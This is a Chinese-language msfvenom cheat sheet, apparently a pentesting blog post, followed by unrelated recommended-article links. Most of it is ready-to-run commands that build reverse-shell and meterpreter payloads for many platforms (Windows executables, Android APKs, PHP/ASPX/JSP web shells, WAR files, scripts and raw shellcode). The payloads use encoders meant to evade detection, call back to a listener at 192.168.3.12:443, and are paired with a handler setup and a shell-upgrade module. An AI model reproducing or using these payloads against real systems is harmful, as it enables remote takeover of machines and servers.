目录

0x01 msfvenom 常规选项

0x02 创建监听器,等待shell回连

0x03 实例创建各类系统平台下的payload:

windows 平台

powershell

linux 平台

mac 平台,没实际测试

android平台

php 脚本

aspx 脚本

jsp 脚本

war包,找个能部署war包的地方,如各类java控制台,部署一下即可执行

nodejs

python

perl

ruby

lua

0x04 利用wireshark观察不同协议下的payload的细节:

bind类型

reverse类型

32位

64位

0x05 生成不同平台下的shellcode

win平台shellcode

linux平台shellcode

mac平台shellcode

0x06 将普通类型的shell升级为meterpreter:


web安全学习了解:web渗透测试

官网:宣紫科技

0x01 msfvenom 常规选项

-l  列出所有可用的payload,编码器,空指令……
-p  指定要使用的msf的payload,也可以使用自定义payload,几乎是支持全平台的
-f  指定payload输出的文件类型,--help-formats,可查看支持的所有输出格式
-e  指定要使用那种编码器
-i  指定编码的次数,如果使用编码器
-b  指定坏字符,比如空字符截断问题,等等……
-x  使用一个自定义可执行程序模板,并将payload嵌入其中
-k  当模板被执行时,payload自动分离并注入到新的进程中,一般和-x选项一并使用
-o  指定创建好的payload的存放位置

0x02 创建监听器,等待shell回连

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set lport 443
msf > set lhost 192.168.3.12
msf > exploit -j

0x03 实例创建各类系统平台下的payload:

windows 平台

# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=443 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o x86_shell.exe

powershell

# msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.3.12 LPORT=443 -e cmd/powershell_base64 -i 3 -f raw -o x86_shell.ps1

linux 平台

# msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=443 -f elf -o x86_shell

mac 平台,没实际测试

# msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=192.168.3.12 LPORT=443 -f macho -o x86_shell.macho

android平台

# msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=443 -f apk -o x86_shell.apk

基于各类web脚本,对于此类的web脚本触发执行方法非常简单,直接在url中访问该脚本即可

php 脚本

# msfvenom --platform PHP -p php/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=443 -f raw -o x86_shell.php

aspx 脚本

# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=443 -f aspx -o x86_shell.aspx

jsp 脚本

# msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=192.168.3.12 LPORT=443 -f raw -o x86_shell.jsp

war包,找个能部署war包的地方,如各类java控制台,部署一下即可执行

# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.3.12 LPORT=443 -f raw -o x86_shell.war

基于其它各类脚本的payload,说几个实战中可能会碰到的语言环境

nodejs

# msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.3.12 LPORT=443 -f raw -o x86_shell.js

python

# msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=443 -f raw -o x86_shell.py

perl

# msfvenom -p cmd/unix/reverse_perl LHOST=192.168.3.12 LPORT=443 -f raw -o x86_shell.pl

ruby

# msfvenom -p ruby/shell_reverse_tcp LHOST=192.168.3.12 LPORT=443 -f raw -o x86_shell.rb

lua

# msfvenom -p cmd/unix/reverse_lua LHOST=192.168.3.12 LPORT=443 -f raw -o x86_shell.lua

0x04 利用wireshark观察不同协议下的payload的细节:

bind类型

windows/meterpreter/bind_tcp
windows/meterpreter/bind_tcp_rc4
windows/meterpreter/bind_hidden_tcp

reverse类型

windows/meterpreter/reverse_tcp
windows/meterpreter/reverse_tcp_dns
windows/meterpreter/reverse_tcp_rc4
windows/meterpreter/reverse_tcp_rc4_dns
windows/meterpreter/reverse_http
windows/meterpreter/reverse_https

32位

windows/meterpreter/bind_tcp

64位

windows/x64/meterpreter/reverse_tcp

0x05 生成不同平台下的shellcode

win平台shellcode

# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=443 -f c

linux平台shellcode

# msfvenom -a x86 --platform Linux -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.3.12 LPORT=443 -f c

mac平台shellcode

# msfvenom -a x86 --platform osx -p osx/x86/shell_reverse_tcp LHOST=192.168.3.12 LPORT=443 -f c

0x06 将普通类型的shell升级为meterpreter:

post/multi/manage/shell_to_meterpreter

msfvenom手册相关推荐

  1. 《Metasploit渗透测试手册》目录—导读

    版权声明 Metasploit渗透测试手册 Copyright © Packt Publishing 2012. First published in the English language und ...

  2. 分布式训练使用手册-paddle 数据并行

    分布式训练使用手册¶ 分布式训练基本思想¶ 分布式深度学习训练通常分为两种并行化方法:数据并行,模型并行,参考下图: 在模型并行方式下,模型的层和参数将被分布在多个节点上,模型在一个mini-batc ...

  3. 正则语法完全正则表达式手册_语法格式重点

    20211202 https://blog.csdn.net/lc11535/article/details/103266263 该表达式打开re.U(re.UNICODE)标志. python –& ...

  4. CUDA C++编程手册(总论)

    CUDA C++编程手册(总论) CUDA C++ Programming Guide The programming guide to the CUDA model and interface. C ...

  5. html iso标准文档,HTML ISO-8859-1 参考手册

    # HTML ISO-8859-1 参考手册 HTML 4.01 支持 ISO 8859-1 (Latin-1) 字符集. ISO-8859-1 的较低部分(从 1 到 127 之间的代码)是最初的 ...

  6. 最好的程序界面就是用户无需去阅读操作手册就知道该如何使用的界面

    最好的程序界面就是用户无需去阅读操作手册就知道该如何使用的界面. 原则 1.一致性  如果你可以在一个列表的项目上双击后能 够弹出对话框,那么应该在任何列表中双击都能弹出对话框.要有统一的字体写号.统 ...

  7. ffmpeg linux安装_ffmpeg命令中文手册

    功能 视频转换和编辑工具 示例 1.从mp4视频文件中提取音频并保存为mp3音频格式 [root@node_116 video]# ffmpeg -i video.mp4 -vn sound.mp3f ...

  8. java修炼手册3.8_Java修炼手册

    <Java修炼手册免费版>是一款专为想要自学JAVA的用户打造的全方位掌上学习软件,拥有各阶段的科学课程模块,从视频,资料,图片,演示等多种方面全面引导用户科学而快速的融入JAVA的世界中 ...

  9. android 设置setmultichoiceitems设置初始化勾选_阿里巴巴Java开发手册建议创建HashMap时设置初始化容量,但是多少合适呢?...

    集合是Java开发日常开发中经常会使用到的,而作为一种典型的K-V结构的数据结构,HashMap对于Java开发者一定不陌生. 关于HashMap,很多人都对他有一些基本的了解,比如他和hashtab ...

最新文章

  1. 5 亿微博数据疑泄露,Python 爬虫如何避免踩天坑?
  2. Go语言学习笔记(一)Let's 干吧
  3. 收藏 | 常见的神经网络求导总结!
  4. js运算符单竖杠“|”的用法和作用及js数据处理
  5. 嵌入式SQL程序的VC+SQL server 2000实现的环境配置
  6. BZOJ3336: Uva10572 Black and White(插头Dp)
  7. 云服务器+开发板搭建直播系统,自建流媒体服务器开直播
  8. 最全整理!Python 操作 Excel 库 xlrd与xlwt 常用操作详解!
  9. 痞子衡嵌入式:ARM Cortex-M内核那些事(2)- 第一款微控制器
  10. 有效期判断功能 java_有效的Java第三版有哪些新功能?
  11. 论文浅尝 | KnowEdu: 一个自动构建教育知识图谱的系统
  12. 整型与布尔型的转换(信息学奥赛一本通-T1022)
  13. Android对点击事件的处理
  14. delphi glsence 教程
  15. 量子计算基础——量子测量
  16. Completed 403 FORBIDDEN 后端解决跨域问题
  17. (三万字长文)类型即正义:TypeScript 从入门到实践系列,正式完结!
  18. 浅谈什么是 云原生
  19. CC2530F256RHAR收发器
  20. lopa分析_保护层分析(LOPA)的优势与局限?

热门文章

  1. Redis(八) - Redis企业实战之优惠券秒杀
  2. Vue前端报错及原因分析集合
  3. windows 7修改网络名称
  4. 换了爸爸,推特用户坐不住了……
  5. 直播连麦怎么自动化测试
  6. yuque-helper 1.0 发布了
  7. 基于Xilinx LUT6设计高效紧凑的2:1 Bus Mux
  8. 为网站配置免费的HTTPS证书 3-4
  9. 如何通过AppStore变态审核:看同行经验
  10. Java进阶学习路线图